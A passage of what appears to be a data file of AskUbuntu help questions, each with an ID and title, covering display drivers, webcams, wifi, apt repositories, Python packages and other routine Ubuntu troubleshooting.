) task exec gpu-manager -- log /var/log/gpu-manager.log list of things i would like to achieve : 1. set monitors so that nvidia-settings detects them ( in the hope that it would then give me more options to fiddle with ) 2. set vsync using the nvidia driver to see if that eliminates the tearing 3. if none of the above work : figure out what exactly is causing the tearing kind regards , alex . edit : i 've installed bumblebee and i have no tearing .
505063	webcam is n't working in ubuntu 14.04	i 'm using ubuntu 14.04 x64 ( lenovo g510 , intel i5 ) but cheese is not working , nor skype . the first thing i did was sudo apt-get install build-essential linux-headers-`uname -r` i then tried to install cheese sudo apt-get install cheese but i think it was already there as this was the output . reading package lists ... done building dependency tree reading state information ... done cheese is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 322 not upgraded . eric @ eric : ~ $ sudo lsusb bus 002 device 002 : id 8087:8000 intel corp . bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:8008 intel corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 002 : id 0bda:0129 realtek semiconductor corp. rts5129 card reader controller bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub eric @ eric : ~ $ sudo modprobe uvcvideo gives nothing ~ no output same for sudo rmmod uvcvideo eric @ eric : ~ $ dmesg | grep uvcvideo [ 91469.832413 ] usbcore : registered new interface driver uvcvideo [ 91839.384427 ] usbcore : deregistering interface driver uvcvideo [ 92126.932716 ] usbcore : registered new interface driver uvcvideo [ 92166.125643 ] usbcore : deregistering interface driver uvcvideo and i get this when i run cheese : eric @ eric : ~ $ cheese ** message : cheese-application.vala:291 : error during camera setup : no device found ( cheese:31540 ) : cheese-critical ** : cheese_camera_device_get_device_node : assertion 'cheese_is_camera_device ( device ) ' failed ( cheese:31540 ) : glib-critical ** : g_variant_new_string : assertion 'string ! = null ' failed ( cheese:31540 ) : glib-gio-critical ** : g_settings_schema_key_type_check : assertion 'value ! = null ' failed ( cheese:31540 ) : glib-critical ** : g_variant_get_type_string : assertion 'value ! = null ' failed ( cheese:31540 ) : glib-gio-critical ** : g_settings_set_value : key 'camera ' in 'org.gnome.cheese ' expects type 's ' , but a gvariant of type ' ( null ) ' was given ** ( cheese:31540 ) : critical ** : cheese_preferences_dialog_setup_resolutions_for_device : assertion 'device ! = null ' failed edit : eric @ eric : ~ $ lsusb -t / : bus 04.port 1 : dev 1 , class=root_hub , driver=xhci_hcd/4p , 5000m / : bus 03.port 1 : dev 1 , class=root_hub , driver=xhci_hcd/14p , 480m |__ port 8 : dev 2 , if 0 , class=vendor specific class , driver=rts5139 , 480m / : bus 02.port 1 : dev 1 , class=root_hub , driver=ehci-pci/2p , 480m |__ port 1 : dev 2 , if 0 , class=hub , driver=hub/8p , 480m / : bus 01.port 1 : dev 1 , class=root_hub , driver=ehci-pci/2p , 480m |__ port 1 : dev 2 , if 0 , class=hub , driver=hub/6p , 480m
505064	how to setup mod_fcgid on apache ( xampp ) ?	i downloaded it from https : //www.archlinux.org/packages/extra/x86_64/mod_fcgid/ and copied /usr/lib/httpd/modules/mod_fcgid.so to /opt/lampp/modules and add loadmodule fcgid_module modules/mod_fcgid.so added loadmodule fcgid_module modules/mod_fcgid.so after loadmodule cgi_module modules/mod_cgi.so to /opt/lampp/etc/httpd.conf and when i try to start all servers or just xampp it runs with no error : starting xampp for linux 1.8.3-4 ... xampp : starting apache ... ok. xampp : starting mysql ... ok. xampp : starting proftpd ... ok . when i try to load http : /localhost/test the browser returns this webpage is not available , when i stop all servers it returns that xampp has n't been started : stopping xampp for linux 1.8.3-4 ... xampp : stopping apache ... not running . xampp : stopping mysql ... ok. xampp : stopping proftpd ... ok . so , how to install it correctly ?
505069	install wifi drivers for ubuntu	i need some help to configure my wireless network . i 've downloaded ubuntu 14.04.1 and installed it using a live cd and every thing is working great but the wifi connection starts at 72 mbps and then goes down to 7 mbps until i restart my wireless adapter again . i have a usb on my dell optiplex gx280 in which ubuntu 14.04.1 is installed i 've found a driver for my realtek 802.11n wlan wireless adapter but i am afraid whether it is the right one . i have the cd that came with the realtek adapter but i dont know how to install it on my ubuntu desktop . i went to the wireless help menu but it does not show how to install drivers from a cd or i am not looking in the right spot . i am new to ubuntu but i can open a terminal : ) and follow directions . the cd which came along with the wireless adapter also has linux compatible drivers
505070	nautilus unable to enable tree view in ubuntu 14.04	using dconf-editor i tried enabling org - > gnome - > nautilus - > list-view - > use-tree-view but even after the check box is selected , plus a reboot , it still does n't switch to the tree view on the side bar . in previous versions of nautilus / ubuntu the side-pane-view setting used to be in the window-state section ( which is now missing ) i 'm i missing something , or is there no way to enable tree view on the side bar in 14.04 ? is there a way to manually create the missing entry back in window-state ?
505071	apt says there are no new upgrades to firefox 27	ubuntu 12.04.4 lts . firefox 27.0. apt-get install firefox says it is already the latest version . i know it is not true . i have precise , precise-backports , precise-security and precise-updates on my sources.list ( full contents here ) . i performed ( apparently successfuly ) and apt-get update and still the result is the same . i was able to install a new pakage ( guake ) so apt is talking to the internet just fine . apt-get upgrade says `` 0 packages updated , 0 new installed , 0 to be removed , 0 not-updated '' . result of apt-cache policy firefox : firefox : instalado : 27.0+build1-0ubuntu0.12.04.1 candidato : 27.0+build1-0ubuntu0.12.04.1 tabela de vers達o : *** 27.0+build1-0ubuntu0.12.04.1 0 500 http : //br.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages 500 http : //security.ubuntu.com/ubuntu/ precise-security/main amd64 packages 100 /var/lib/dpkg/status 11.0+build1-0ubuntu4 0 500 http : //br.archive.ubuntu.com/ubuntu/ precise/main amd64 packages
505074	unknown display ( nvidia )	recently installed ubuntu 14.04 on my computer ( nvidia gtx 650 graphics card with a samsung monitor ) . problem is when i try to change the resolution , it does n't recognize my display ( unknown display ) and therefore only gives it basic resolution options . i know this has been asked a lot over the internet but everyone says different things and what i tried did n't solve anything . i tried using this command : xrandr -- newmode $ ( cvt 1920 1080 60 | grep mode | sed -e 's/ . * '' /1920x1080/ ' ) but no new resolution appeared on the display window . i tried : xrandr -- addmode s-video 1920x1080 but it says it does n't find s-video , and i do n't know what arguments to give it . i tried disconnecting the monitor for a few seconds then turn it on then run ubuntu , but nothing . i guess you could say i tried installing nvidia drivers , but i do n't really know how to do this for sure because there are a lot of different ways to do this , i 'd appreciate a good guide . how do i fix this ? edit : i now installed the right driver using additional drivers , display is still unknown . thanks .
505076	what is cost of kernel-mode switch on ubuntu ?	what is the cost in cpu cycles of a kernel-mode switch , so from user mode , to kernel mode and back to user mode , on ubuntu ?
505077	how do i disable unity dash search features like wiki and other websites ?	on my system this not needed and affecting performance . i 'd like unity-dash to search only for programs and documents by default . how can i achieve that ?
505081	what version of python do i have ?	how can i find out what versions of python i have ? i am using ubuntu 14.04 ( trusty tahr ) .
505084	exchange 2010 email client for ubuntu 14.04.01 lts	is there a current email client for the most recent release of ubuntu 14.04.01 lts ?
505086	ubuntu freezing a few seconds after the desktop appears	so this morning i tried to start ubuntu and while it was trying to start the desktop it came up with the messages : uvd not responding ! trying to reset the vcpu , much like in the thread seen here ( drm : r600_uvd_init ) *error* uvd not responding , trying to reset the vcpu ! . my desktop then boots and everything works for about 10 seconds , then my mouse and keyboard completely freeze . the uvd messages are most likely related to my switchable amd radeon 7970m which recently stopped working at the hardware level and resulted in me having to completely wipe my harddrive and reinstall everything . first off , is the issue of the desktop freezing after 10 seconds related to the uvd error ? and secondly is there any way to stop ubuntu from trying to use the alternate graphics card and force it to just use the internal ?
505089	keyboard style different from region language	i am booting ubuntu lts in english from a usb-stick , but the computer i am on has a german keyboard , so it is a real typing adventure . is it possible to change the keyboard to german style and keep the system language in english ? if so , how ?
505090	what are the software updated when i updated through the default software updater gui ?	automatically the ubuntu asks for its users to update the latest updates , but all the time i am unaware what gets updated . how am i supposed to know what are the updates installed ? how can i manage the updates and install knowing my necessity ?
505094	port 27005 closed - how can i force it to open ?	i have a vps ( virtual server ) hosted by ovh . i run gmod on the vps ; port 27015 is the server port , and that is open . however , 27005 is not . ip tables is blank as i just flushed it and it is still closed . 27005 is crucial as it is the query port . how do i unblock 27005 for everyone ? i use ubuntu 14.04 64 bit . root @ vps # # # # # : ~ # nmap localhost -p 27005-27020 -- unprivileged starting nmap 6.00 ( http : //nmap.org ) at 2014-08-02 11:31 cest nmap scan report for localhost ( 127.0.0.1 ) host is up ( 0.00014s latency ) . other addresses for localhost ( not scanned ) : 127.0.0.1 rdns record for 127.0.0.1 : localhost.localdomain port state service 27005/tcp closed flexlm5 27006/tcp closed unknown 27007/tcp closed flexlm7 27008/tcp closed unknown 27009/tcp closed flexlm9 27010/tcp closed flexlm10 27011/tcp closed unknown 27012/tcp closed unknown 27013/tcp closed unknown 27014/tcp closed unknown 27015/tcp closed unknown 27016/tcp closed unknown 27017/tcp closed unknown 27018/tcp closed unknown 27019/tcp closed unknown 27020/tcp closed unknown although it says : port 27015 is open on # # . # # . # # # . # # # .
505095	how to download operating system from one computer too use on a dell vostro 1000 with no operating system	i need a operating system for my dell vostro 1000. can i make copy to cd on this computer , that would run and set up ubuntu on the dell ? if so , great . how ?
505096	getting connection time out error for local repository	as we know that ubuntu 12.10 ( quantal ) is at eol . so all the package repositories are moved to http : //old-releases.ubuntu.com/ubuntu . i can access all the packages from that url . now i have set up some packages on my private server . for building my local repository i referred following links https : //help.ubuntu.com/community/createauthenticatedreposito and http : //www.hiddentao.com/archives/2011/06/27/setting-up-a-simple-ubuntu-apt-repository/ also made the changes in the sources.list file . but when i do sudo apt-get update or sudo apt-get install my_package then i get following error could not connect to xxxxx.xxxx.com . - connect ( 110 : connection timed out ) how can i resolve this error . is there port issue ( like i have to open port or is there any firewall issue ) or is there any other issue .
505097	what bigtiff capable image viewers are there for ubuntu ?	i have looked at imview and evince but they do not seem to be able to open my bigtiff files . are there any viewers that can handle this file type ?
505098	how can one prevent new windows from taking focus in ubuntu 14.04 ?	i want to prevent new windows from acquiring focus . a way to do this is provided in ubuntu 10.10 here and in ubuntu 12.04 here . how can something similar be achieved in ubuntu 14.04 ? the auto-raise setting in ubuntu tweak tool 's additional workspace settings looks promising , but i have no idea how to use it .
505101	lost unity chrome	this morning , when i started up ubuntu , it looked like the unity design had vanished . likewise , google chrome took on the platform-generic style and pidgin became gray boxes with black frames . ubuntu 14.04 32bit , latest everything . how can i get the unity style back ?
505102	after an upgrade to 14.04 , grub menu shows both 12.04 and 14.04	i updated ubuntu from 12.04 to 14.04 . the grub menu shows both ubuntu 12.04 and 14.04 . i do n't think the older entry should still be there . i need to remove the old one . how am i supposed to do so ?
505103	deluser not working	i am having an issue removing a user from the sudo group . i may be doing it wrong . i added a user to the group to gain access to a file but now i want to remove that privilege . i first did sudo adduser user sudo then later removed the suer with sudo deluser user sudo . even though saying that the user has been removed from sudo , the user still has sudo permissions . is there some other way of removing them ?
505104	how do i choose the os to boot ?	i had windows 7 on my hard drive , then i installed ubuntu 14.04 to dual boot ( i have several partitions and ubuntu is working fine ) . but i do n't know how to switch between the two in boot time . i read a menu for me to choose should appear at boot time , but it justs boots up to ubuntu without asking me ... i know i did n't wipe my hard drive by accident because i can see my windows files from ubuntu . so how do i switch between the two ? is there a button i should press or a setting i should turn on ?
505105	git clone results in gnutls_handshake failed : a tls packet with unexpected length was received	i am running ubuntu 12.04 and git 1.7.9.5 . a couple days ago , git was working fine . it would appear the installation or configuration of the passenger module for apache2 has modified some necessary package or altered a file used by one of them , and now any attempt to git clone i have tried results in : error : gnutls_handshake ( ) failed : a tls packet with unexpected length was received . while accessing https : //github.com/fnando/i18n-js.git/info/refs fatal : http request failed all references i can find to this error when attempting a git clone are dated and appear to have to do with at one time , a bug in the default install of git . i have attempted the steps in https : //bugs.launchpad.net/ubuntu/+source/pycurl/+bug/926548 but this is not working ; the dpkg-source command fails because pycurl_7.19.0-ubuntu3.dsc does not exist . i have tried removing and reinstalling a number of packages , including git , curl , libcurl3-gnutls , and libcurl4-openssl-dev with no change - git clone still fails with this same error . at this point , i mostly care about restoring the use of git clone ( and whatever other functions will ultimately fail because of the underlying issue ) .
505111	run executable jar file	i 'm using ubuntu 14.04 lts and build javaapplication using netbeans so in the dist directory has executable jar file but does n't execute as program it 's opening through gedit.why do n't run executable jar file ?
505113	not authorized error message	whenever i plug in my usb drive i get the message not authorized . i have tried to mount and i still get the error . how can i fix this permanently so that i can plug any usb drive in my computer and it works automatically without breaking my os ? unable to access â500 gb volumeâ and udisks -error- quark 4 is the message that i 'm getting . i 'm also using ubuntu 14.04 lts.the partition type is hpfs/ntfs the model is a wd 5000mv external . the system shows the partitioning as a master boot record
505115	not connecting to with wifi	i installed ubuntu 14.04 at dell inspiron 4030 . it shows wifi connection but when i try to connect it with security key it does not connect . way the problem is
505116	pptpd connects but no data	i have setup pptp on my vps using this tutorial https : //help.ubuntu.com/community/pptpserver no issues there . i can connect via mobile device successfully with the username and password i configured but there 's no internet on the phone . skype/websites/whatsapp nothing i tried the suggestions here too pptpd vpn : no internet access after connecting i checked many answers but i 'm seriously stuck . any ideas ? no idea how to troubleshoot either
505117	ipset with iptables-persistent	iptables-persistent was not reloading my rules at restart , and i realized the problem was that /etc/iptables/rules.v4 contained a -- match-set referring to a set of rules created by ipset - which had not been saved . so the underlying iptables-restore command would fail because it could not find the referenced set . so my question is : how can i incorporate ipset persistence into iptables-persistent ? i can manually run ipset save after updating a set - but how can i get that set reloaded prior to iptables-persistent running on restart ?
505120	how to enable second x session on tty8 in 14.04	how can i enable a second x session on tty8 in ubuntu 14.04 ? /etc/lightdm/lightdm.conf and [ lightdm ] seats=seat:0 , seat:1 ... [ seat:0 ] user-session=ubuntu autologin-user= [ seat:1 ] user-session=ubuntu autologin-user= is not working as this file seems to be edited replaced in 14.04 . any ideas ? thanks !
505121	uninstalling window and using ubuntu as the only os	i do all my task in ubuntu . how will i be able to remove the windows8 using ubuntu ? i do n't want to see windows8 name displayed in the grub menu . and i want ubuntu to be started in the first hand after i boot my computer . will it harm any files , folder and partition ?
505124	startup sequence /etc/init	is there a start up sequence regarding configuration files in /etc/init ? where can found document regarding the syntax ? thanks
505125	shell script exits without evaluating if condition	i have the following commands in my shell script # this line basically builds a source library $ build_cmd $ configfiles/ $ 1.prj $ buildfilespath if [ $ ? -eq 0 ] ; then echo `` build success\n '' # do something here else echo `` build failure\n '' # do something else here fi the build fails , however , the if condition is not evaluated and it does not echo a `` build failure . '' the script just exits after the build command line . any ideas ?
505126	system-level energy/power preferences	in windows , mmc allows to set energy/power preferences for all users at a system-level : they ca n't change these settings until an administrator unlocks them . is there any way to do the same in ubuntu ? ( i know i can customize those settings in /etc/skel + locking down permisisons of power management binaries and user preferences : is there a more elegant and not so tricky solution ? )
505129	how to make a2dp device automatically connect	i have this mini speaker ( called sboom500 ) which is a rather standard a2dp bluetooth audio device . my problem is that when i turn on the device , first of all it does not automatically connect . it just sits there with a set of blinking lights , which indicated the fact that it is discoverable . i then have to remove the device in the bluetooth settings , and add it again in order for it to work . just switching the slider of the device to on doesnt do anything . when the device is connected ( i know it is , because lights stop flickering and it makes a sound ) it does not show up as an output device in the sound settings . sometimes it does , sometimes it does not . i did not really figure out what the logic between the different attempts is . did anyone fix this problem , or have a similar case ?
505130	network printer , ubuntu 12,04 , ca n't enter department id & password	i decided to install ubuntu 12.04 on two xp desktops and came to a problem , since i know just enough about linux . we have a network printer canon ir2270 accessed over smallbusinessserver 2011 . the printer has a resttricted access policy and computers not in domain have to use department id and password to print . now , in w7 and wxp i just add both in the printer preferences under the security tab - > password . but when i install the printer in ubuntu , be it as add printer in printers or over cups , i get no tab where i could enter the dept . id & pass . i did search the net and came over this solution network printer not providing prompt for id and password . my questions : - how do i install a printer using downloaded installation package ; - do i use .rpm or .deb files ; - the article mentions editing ppd file , how can i do that , if i 'll need to do it ? thanks alen
505137	upgrade ubuntu 12.04 lts to ubuntu 14.04 lts	i want upgrade from 12.04 to 14.04 because of many reasons . one is that my hwe is at eol . but update-manager does n't notify me , maybe because the note of the hwe the place blocks . the command : do-release-upgrade says `` no new release found '' , and i do n't want do the command : do-release-upgrade -d. update to a newer hwe is not in my opinion and it does n't work . thank you for help .
505139	wine1.6 download for ubuntu	i have a new 32-bit ubuntu and tried to download wine1.6 . i followed the instructions on the winehq site but the response was that i had to `` chose an application '' to proceed . having got no further with that i used the terminal window and with sudo apt-get install wine1.6 . that was running quite well but a window labelled `` configuring ttf-mscorefonts-installer '' appeared which looked like a standard terms and conditions . there was an `` '' in the window but it was not cursor sensitive nor did `` return '' have any effect . ideas , please !
505141	unable to install/import tkinter	i got a pretty confusing problem : i build a python program using tkinter . then i dist-upgraded my ubuntu 13.10 ( amd64 ) to ubuntu 14.04 lts , now i tried to run my tkinter program . my compiler told me importerror : no module named tkinter ( the same with tkinter or tk/tk ) then i tried to reinstall tkinter using pip : $ pip install tkinter could not find any downloads that satisfy the requirement tkinter cleaning up ... no distributions at all found for tkinter again the same with tkinter , tkinter , tk and tk so what happened ? have i got to run something like $ pip update ( because tk is n't anymore in the pip-repository ) but why is n't it installed anymore on my pc ? edit : 1 . i got no root acces 2. in the pip.log is > downloading/unpacking tk getting page > https : //pypi.python.org/simple/tk/ could not fetch url > https : //pypi.python.org/simple/tk/ : 404 client error : not found will > skip url https : //pypi.python.org/simple/tk/ when looking for download > links for tk getting page https : //pypi.python.org/simple/ urls to > search for versions for tk : * https : //pypi.python.org/simple/tk/ > getting page https : //pypi.python.org/simple/tk/ could not fetch url > https : //pypi.python.org/simple/tk/ : 404 client error : not found will > skip url https : //pypi.python.org/simple/tk/ when looking for download > links for tk could not find any downloads that satisfy the > requirement tk something pretty close happened when i tried to install something using apt on my raspberrypi without running $ apt-get update for a few months i 'd be glad for some help .
505145	how can i make my display work again in xubuntu ?	i 'm running xubuntu 14.04 and i was testing some stuff because i have a dual display setup , and one display never wakes up from suspend . so i tried this , to see if the display would wake up : sudo startx ..and then hell broke loose . now every time i try to login the gui disappears , only the login screen is visible then after login both displays turn off . i have been searching the internet for solutions and tried this so far : i have tried to chown .xauthority and .iceauthority back to my user , i have even rm them . i have also tried to rm .x0-lock . i have tried to start lightdm from the shell . i have tried to remove and reinstall xorg ... nothing helps ... now i know that i must never use sudo when running startx . but what i can do to fix my problem , help ! !
505147	what are the main open source two way sync frameworks available natively on ubuntu , which sync via `` diff merging '' ?	so again , the software needs to be : open source - so i can program with it . sync two ways - so two or more users can have simultaneous control over one file , unlike rsync which syncs only one way . available naively on ubuntu - because i do not want to deal with wine or google docs . syncs via a diff merge - because this is quicker than replacing the entire file . my specific use case : i need to use this software as a backend to a project i am creating for collaborative editing . this project will be a plugin for the ubuntu sdk . while i have heard of projects such as google wave , and gobby ; these are not solutions for what i am trying to accomplish . however ; if you are aware of the underlying technology they are utilizing , i would be interested to hear what they used . otherwise ; i just want to know what is available on ubuntu , so i can do my research from there . edit : just to clarify , unison is an example of a program i am looking for . http : //www.cis.upenn.edu/~bcpierce/unison/
505148	can you `` fix '' chrome 's close , minimize , maximize buttons so they are on the left , and use ubuntu 's theme ?	can you `` fix '' chrome 's close , minimize , maximize buttons so they are on the left , and use ubuntu 's theme ? i might actually use chrome then .
505152	huawei e303c driver install failed lubuntu 14.04	i recently installed lubuntu 14.04 . i plugged my huawei modem e303c 3g and copied the driver to desktop and tried to installed it in terminal but this appears : driver copy start sta_path_flag= start_path_driver=/home/rahulraz/desktop/driver current install from /home/rahulraz/desktop/driver/install install_path is not set , auto install install_path=/usr/local/mobile_partner install_path is another path rm /usr/local/mobile_partner/driver driver copy end modinfo : error : missing module or filename . rmmod : error : ../libkmod/libkmod-module.c:769 kmod_module_remove_module ( ) could not remove 'cdc_ether ' : no such file or directory rmmod : error : could not remove module cdc_ether : no such file or directory rmmod : error : ../libkmod/libkmod-module.c:769 kmod_module_remove_module ( ) could not remove 'usbnet ' : resource temporarily unavailable rmmod : error : could not remove module usbnet : resource temporarily unavailable rmmod : error : ../libkmod/libkmod-module.c:769 kmod_module_remove_module ( ) could not remove 'hw_cdc_driver ' : no such file or directory rmmod : error : could not remove module hw_cdc_driver : no such file or directory ./make_driver.sh : line 7 : make : command not found ./make_driver.sh : line 8 : make : command not found ./make_driver.sh : line 9 : make : command not found install ndis driver failed . the compiling environment is not all ready . please check gcc , make and kernel buid ( /lib/modules/3.13.0-24-generic/build ) to be all installed ? now please enter any key to finish other installations . i tried both methods given here , but it did n't work , i got the same result .
505153	installed new hardware support for 12.04 , now ca n't see anything in vmware after login	as stated , the updatemanager requested that i update my hardware support . i believe it said that my hardware stack as it existed previously would n't be supported after 8/07 . i installed the update , rebooted , get to the login screen , everything seems fine ... login successfully but nothing loads ; after about 10 seconds of blank desktop background , vmware tools kicks in , makes the screen the correct size , and suddenly the screen goes black . rebooting does n't help . setting 3d acceleration to `` off '' in the vm settings helps , and lets me do things like run a terminal just fine ( so i believe this problem should be solvable from within ubuntu ... . i 'd like to avoid wasting my time making another vm and migrating the filesystem , preferably maintaining the most up-to-date 12.04 possible ) ; this information may be useful in diagnosing the issue but is not a long-term solution , as it makes many graphical features of ubuntu anywhere from buggy to nonexistent . my graphics card is the amd ( ati ) firepro m5950 ( since this seems to be a graphics-related issue , possibly with a new driver that came with the update ? but for the record , i have already tried adding mks.gl.allowblacklisteddrivers = `` true '' to the relevant vmx file , to no effect whatsoever ) .
505155	virtual installation of ubuntu	i have a laptop of the following specs : i7 4th gen processor 8 gb of ram i 'm installing ubuntu in vmware workstation . is it better to use a single file for the virtual disc use multiple files for the virtual disc ? what are advantages and disadvantages between them ?
505157	ubuntu 14.04 lts freezes on restart	i am pretty new to ubuntu . i just installed 14.04 on my dell m4600 a few days ago . i noticed during the install , when it said remove installation media and press enter , it froze after i pressed enter . after 20mins of waiting , i held the power button to shut down . also , whenever i try to restart the system from the shutdown menu , it freezes on the purple shutdown screen . if i choose shut down it works perfectly fine , though . any ideas ?
505158	is this a bug or normal ( mis ) behavior ?	when i sudo-rebooted from the top-right menu , after unity closed i was taken to an open tty , where i saw my login password in plaintext where i had typed it in earlier . in ubuntu-bug , a specific non-bug had something to do with tty sudo . is this a bug , and if not , how can i prevent it ?
505160	display resolution broken after sleep	i recently install xubunut 14.04 about half the time when i wake it up after the display goes to sleep display settings are wrong ( maybe just the resolution ) . rebooting has fixed it so far . how can i prevent this ? how can i reset it to the correct settings without rebooting .
505161	incremental history searching	i found this very useful tip in usingtheterminal to use the arrow keys to search through the command history : '' \e [ a '' : history-search-backward '' \e [ b '' : history-search-forward '' \e [ c '' : forward-char '' \e [ d '' : backward-char how can i change it in order to use ctrl+p and ctrl+n instead of the arrow keys ?
505167	sony vaio sve15113enb brightness fn key slider issue -ubuntu 14.04 lts	i am using a sony vaio sve15113en laptop . recently i installed ubuntu 14.04 and found out that i am unable to adjust my display brightness slider . the brightness is so high that i am unable to use the laptop while using ubuntu . i request the experts here to guide me to resolve this issue . thanking you all in advance for your time and replies . i have tried all the below commands , but nothing happened : cat /proc/cmdline your video card and driver : code : sudo lspci -vnn | grep -a12 vga you backlight interfaces : code : for i in /sys/class/backlight/* ; do echo $ i ; cat $ i/brightness ; cat $ i/max_brightness ; done echo 15 | sudo tee /sys/class/backlight/acpi_video0/brightness echo 6 | sudo tee /sys/class/backlight/acpi_video0/brightness code : echo 2441 | sudo tee /sys/class/backlight/intel_backlight/brightness echo 4882 | sudo tee /sys/class/backlight/intel_backlight/brightnes acpi_listen sony/hotkey snc 00000001 00000011 sony/hotkey snc 00000001 0000003b sony/hotkey snc 00000001 00000010 sony/hotkey snc 00000001 0000003b but instead of snc i got sny . create the following files with the following content ( you will need root privileges to do this , so for each file , run `` gksu gedit `` where is : ) /etc/acpi/events/sony-brightness-up code : event=sony/hotkey snc 00000001 00000011 action=/etc/acpi/brightup.sh /etc/acpi/events/sony-brightness-down code : event=sony/hotkey snc 00000001 00000010 action=/etc/acpi/brightdown.sh /etc/acpi/brightdown.sh code : ! /bin/bash curr=cat /sys/class/backlight/intel_backlight/actual_brightness if [ $ curr -gt 406 ] ; then curr= $ ( ( curr-406 ) ) ; echo $ curr > /sys/class/backlight/intel_backlight/brightness ; fi /etc/acpi/brightup.sh code : ! /bin/bash curr=cat /sys/class/backlight/intel_backlight/actual_brightness if [ $ curr -lt 4477 ] ; then curr= $ ( ( curr+406 ) ) ; echo $ curr > /sys/class/backlight/intel_backlight/brightness ; fi then , make all 4 of those scripts executable by running the following commands : code : sudo chmod +x /etc/acpi/events/sony-brightness-up sudo chmod +x /etc/acpi/events/sony-brightness-down sudo chmod +x /etc/acpi/brightdown.sh sudo chmod +x /etc/acpi/brightup.sh and finally , restart acpid : code : sudo service acpid restart
505168	pgadmin show object browser text white on white with dark theme	when using a dark theme , the object browser uses white background . is there some way to change this ? this question has been asked a few times , but no answer still . the theme i am using is e17 . ( note : i can not add the tag for pgadmin as my reputation is not high enough . )
505170	network manager disappeared on ubuntu 14.04	after an update , the icon network manager disappeared from the panel . i tried to add it manually but : bash > nm-applet nm-applet-message : using fallback from indicator to gtkstatusicon i 'm using gnome do you know what caused this ?
505173	execute script before ups is empty	i need to generate a sms / email alert when the serverâ´s ups is finishing its charge . we have a car battery connected to the motherboard that works as a ups ( http : //www.mini-box.com/m2-atx-160w-intelligent-automotive-dc-dc-power-supply ) when this device detects that battery is lowering the voltage , its send an on pulse to the motherboard . somehow ubuntu ( iâ´m using version 11 ) detects this pulse and shows a screen telling that in 60 seconds ubuntu will shutdown . i need to execute a script to call a webservice to notify this situation . how can i trap that alert ? i have also tried also using a script in rc0.d but it is not calling my ws ( seems that network is down before it is executed ) . how can i alternatively execute something in runlevel 0 before network is down ?
505174	apt-get update error for a local repository	i set up a local repository with the following file structure : /var/www/html/dists $ find . -name `` * '' . ./boston ./boston/main ./boston/main/binary-amd64 ./boston/main/binary-amd64/python-openvswitch_2.1.2-51_all.deb ./boston/main/binary-amd64/packages.gz ./boston/main/binary-amd64/openvswitch-switch_2.1.2-51_amd64.deb ./boston/main/binary-amd64/openvswitch-datapath-dkms_2.1.2-51_all.deb ./boston/main/binary-amd64/openvswitch-common_2.1.2-51_amd64.deb the /etc/apt/sources.list has the following entry deb http : //10.209.0.10 boston main however the apt-get update fails with the following message : sudo apt-get update ign http : //10.209.0.10 boston release.gpg ign http : //10.209.0.10 boston release ign http : //10.209.0.10 boston/main translationindex err http : //10.209.0.10 boston/main amd64 packages 403 forbidden ign http : //10.209.0.10 boston/main translation-en_us ign http : //10.209.0.10 boston/main translation-en w : failed to fetch http : //10.209.0.10/dists/boston/main/binary-amd64/packages 403 forbidden there is no packages file but there is packages.gz . when i monitor the apache log , there is no activity shown . the output of apt-get update -- print-uris is : '10.209.0.10/dists/boston/main/binary-amd64/packages.bz2 ' ; '10.209.0.10_dists_boston_main_binary-amd64_packages 0 : '10.209.0.10/dists/boston/main/i18n/index.bz2 ' ; 10.209.0.10_dists_boston_main_i18n_index 0 : '10.209.0.10/dists/boston/release ' ; 10.209.0.10_dists_boston_release 0 '10.209.0.10/dists/boston/release.gpg ' ; 10.209.0.10_dists_boston_release.gpg 0 i created the packages.gz with the following command : dpkg-scanpackages binary-amd64 > /dev/null | gzip > binary-amd64/packages.gz based on the debian howto . i added a release file : /var/www/html/dists/boston $ cat release archive : boston version : 2.1.2 component : main origin : kam label : kam architecture : amd64 md5sum : 4059d198768f9f8dc9372dc1c54bc3c3 14 main/binary-amd64/packages.gz any ideas on debugging this problem ? thanks ,
505175	desktop settings wo n't save after uninstalling wally	i 'm running xubuntu 14.04 64-bit . i installed wally but could n't get it to work so i uninstalled it . when i right-clicked on the desktop , chose desktop settings , the folder for the wallpapers was still set to the .wally folder . i deleted that folder and now when i try to go back to the original folder that contains all the wallpapers , it wo n't save the settings . how can i fix this ?
505177	unlock screen from command line	i was using virtualbox on a laptop and closed the lid which locked the screen and sleep the computer . now it came back from sleep , the screen is locked , but i can not type my password . the mouse work , i can set focus in the password box , but typing does nothing . i guess the keyboard is held by virtualbox . i tried plugin in a keyboard , no luck . i tried killing unity-panel-service -- lockscreen-mode , it seems to have a watchdog that restart it . i 'll find some commandline to sleep my vm , but is there anyway to unlock the screen from commanline ?
505178	different sources are reporting different cpu usage levels when system is idle , how can i determine which is accurate ?	sorry if this is a repost , my google searches did n't turn up anything with an applicable solution to my issue , the closest i got was this one when i posted my stats for the same question i was told not to ask the same question in a thread . so now i 'm starting a new thread for the same question instead . i have an old pc with the following specs : 4gb of ddr2 ram ( 4x1gb @ 1333mhz ) amd athlon 64 x2 dual core processor 4200+ ă2 gigabyte ga-ma69vm-s2 motherboard 2x 256gb ssd in a softraid1 via ubuntu 's installer 1tb hdd for extra space running : release 12.04 ( precise ) 64-bit ( server ) kernel linux 3.5.0-54-generic gnome 3.4.2 according to top my cores are running : top - 14:47:56 up 8 days , 55 min , 4 users , load average : 2.69 , 3.13 , 2.97 tasks : 210 total , 4 running , 205 sleeping , 0 stopped , 1 zombie cpu ( s ) : 13.8 % us , 10.5 % sy , 72.0 % ni , 3.2 % id , 0.3 % wa , 0.0 % hi , 0.2 % si , 0.0 % st mem : 3919760k total , 3461844k used , 457916k free , 164664k buffers swap : 19528700k total , 1062256k used , 18466444k free , 963632k cached pid user pr ni virt res shr s % cpu % mem time+ command 28746 www-data 39 19 144m 40m 3412 r 21 1.0 0:00.63 gbrowse 7269 root 20 0 528m 24m 9408 r 12 0.6 1292:27 gnome-system-mo 1311 root 20 0 233m 63m 4164 s 8 1.6 778:52.73 xorg 28748 www-data 39 19 38080 8216 2076 r 3 0.2 0:00.10 gbrowse 1208 www-data 39 19 626m 120m 3884 s 1 3.1 50:32.07 /usr/sbin/apach 2944 root 20 0 1370m 430m 31m s 1 11.2 54:27.70 firefox 17696 www-data 39 19 472m 103m 4040 s 1 2.7 13:17.29 